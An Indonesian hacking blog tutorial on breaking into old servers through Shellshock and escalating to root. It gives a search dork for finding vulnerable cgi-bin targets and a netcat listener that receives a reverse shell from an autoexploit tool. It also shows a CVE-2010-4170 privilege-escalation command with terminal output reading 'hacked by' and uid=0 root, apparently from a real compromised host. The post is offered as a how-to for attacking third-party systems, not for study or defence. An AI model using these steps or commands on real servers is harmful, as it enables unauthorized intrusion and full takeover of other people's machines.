From Shellshock Exploit to Server Full Root Acces

From Shellshock Exploit to Server Full Root Acces
Profil Info Written By
2:03 AM
Sebenarnya Shellshock Exploit ini termasuk exploit lama. Saya kenal exploit ini di 2014 lalu. Namun beberapa hari belakangan ini kembali ramai semenjak teman teman dari IndoXploit Coders membuat tools autoexploit untuk bug ini, apalagi yang lebih menarik adalah rata rata yang vuln oleh exploit ini adalah server tua dimana kita bisa mendapat hak akses penuh alias id "root" di server yang kita retas tersebut.

Seperti screenshot diatas, kita benar benar mendapatkan akses root diserver target.
Dork : 
intext:"Sun Microsystems, Inc. All rights reserved." inurl:/cgi-bin/
use your brain bitch!
Tools : 
Shellshock Autoexploit Tool
Nah, setelah kalian mendapatkan web atau server yang dirasa vuln, kita bisa melakukan exploit shellshock nya.
Pertama dari VPS ( atau dari ip statis jika kalian punya ), kita lakukan back connect dengan memasukkan command 
nc -l 1337 
( 1337 adalah port yang akan kita buka, silahkan tentukan sendiri bebas )
Setelah itu dari tool autoexploitnya kita masukkan url target, ip dari VPS / ip publik kita, dan juga port yang kita gunakan untuk back connect tadi. Tools ini sendiri otomatis akan melakukan reverse shell sehingga kita akan mendapatkan bash shell dari server target di vps kita.
Pertama kita cek dulu di versi kernel nya.
uname -a
Seperti yang saya katakan sebelumnya bahwa rata rata yang bakal vuln adalah server tua ( rata rata adalah 2010) , maka kita bisa melakukan previlege escalation disini memanfaatkan bug CVE-2010-4170.
Lihat detail exploitnya disini :
https://www.exploit-db.com/exploits/15620/
https://rhn.redhat.com/errata/RHSA-2010-0894.html
[ttaserv@extranet tmp]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u
 whatever
echo " hacked by yzrinori "; uname -rv; whoami; id
 hacked by yzrinori
2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010
root
uid=0(root) gid=0(root) groupes=500(ttaserv)
Nah bagi yang masih bingung, kalian bisa pelajari tentang manual exploit untuk shellshock sendiri disini :
http://exploit.linuxsec.org/2015/05/shellshock-vulnerability-exploit-on.html
Cukup sekian share kali ini, semoga bermanfaat, jangan lupa subscribe untuk mendapat tutorial terbaru.
Credit :
indoxploit.or.id - linuxsec.org
From Shellshock Exploit to Server Full Root Acces

Dapatkan Tips Menarik Setiap Harinya!

  • Dapatkan tips dan trik yang belum pernah kamu tau sebelumnya
  • Jadilah orang pertama yang mengetahui hal-hal baru di dunia teknologi
  • Dapatkan Ebook Gratis: Cara Dapat 200 Juta / bulan dari AdSense

0 Response to " From Shellshock Exploit to Server Full Root Acces"

Post a Comment

Catatan Untuk Para Jejaker
  • Mohon Tinggalkan jejak sesuai dengan judul artikel.
  • Tidak diperbolehkan untuk mempromosikan barang atau berjualan.
  • Dilarang mencantumkan link aktif di komentar.
  • Komentar dengan link aktif akan otomatis dihapus
  • *Berkomentarlah dengan baik, Kepribadian Anda tercemin saat berkomentar.

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel